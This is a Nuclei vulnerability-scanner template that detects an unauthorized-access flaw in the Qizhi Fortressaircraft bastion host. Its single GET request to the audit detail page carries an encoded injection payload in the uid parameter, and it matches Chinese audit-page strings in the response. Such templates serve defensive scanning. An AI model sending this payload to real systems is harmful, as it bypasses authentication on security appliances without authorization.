id: qizhi-fortressaircraft-unauth info: name: Qizhi Fortressaircraft Unauthorized Access author: ritikchaddha severity: high reference: - https://mp.weixin.qq.com/s/FjMRJfCqmXfwPzGYq5Vhkw tags: qizhi,fortressaircraft,unauth requests: - method: GET path: - "{{BaseURL}}/audit/gui_detail_view.php?token=1&id=%5C&uid=%2Cchr(97))%20or%201:%20print%20chr(121)%2bchr(101)%2bchr(115)%0d%0a%23&login=shterm" matchers-condition: and matchers: - type: word part: body words: - "错误的id" - "审计管理员" - "事件审计" condition: and - type: status status: - 200